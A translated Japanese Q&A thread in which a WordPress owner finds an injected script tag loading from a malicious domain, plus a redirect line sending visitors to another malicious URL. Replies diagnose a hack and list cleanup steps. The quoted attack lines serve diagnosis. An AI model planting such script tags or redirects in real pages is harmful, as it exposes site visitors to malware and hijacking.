誰かが私のサイトをハイジャックしていますか?
私はこの問題にかなり困惑しており、何が原因であるのか全く分かりません。何らかの理由で管理パネルがめちゃくちゃになり、すべてのCSSが正しく表示されなくなるまで、Wordpress Webサイトが正常に機能しています。さらに調査すると、次のように、load-scripts.phpとload-styles.phpが奇妙な文字で読み込まれていることがわかりました。
これは基本的にデフォルトのWordpressインストールであり、そのファイルを再アップロードしましたが、問題は解決しません。ヘッダーにはUTF-8であると書かれているため、文字エンコーディングの問題ではないようです。
そのような恐ろしい部分があります。そのURLからすべてのget属性を削除すると、ページが表示されます。
<script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"></script>
Safariは悪意があると言っているので、そのサイトには移動しません。しかし、これはどのように起こっているのでしょうか?そのURLが表示されるのはなぜですか?そのページのコードは編集されていません。
そのスクリプトには次のコードが含まれています。
window.top.location.replace("http://litic82sreac.rr.nu/n.php?h=1&s=nl");
ユーザーをhttp://litic82sreac.rr.nu/n.php?h=1&s=nlにリダイレクトします。最近、この種の攻撃がphpBBサーバーとMediaWikiサーバーの両方で見られたため、ハッキングされたWebホストである可能性があります。
どのWebホストを使用していますか?
間違いなくハック!
- サイトをローカルでバックアップし、Zipファイルにポップして、必要な場合に備えて保管してください。
- データベースをバックアップし、再度圧縮して、必要な場合に備えて予備のコピーを保管します。
- ワードプレスのクリーンインストールを行い、完了したらコードと設定をバックアップします
- テーマファイル(各テーマファイルで厄介なコードを確認)とプラグインを移行し、数日間注意深く見て、攻撃が再出現するかどうかを確認します。
- Wordpressのロックダウンの詳細については、 私の答えはこちら を参照してください。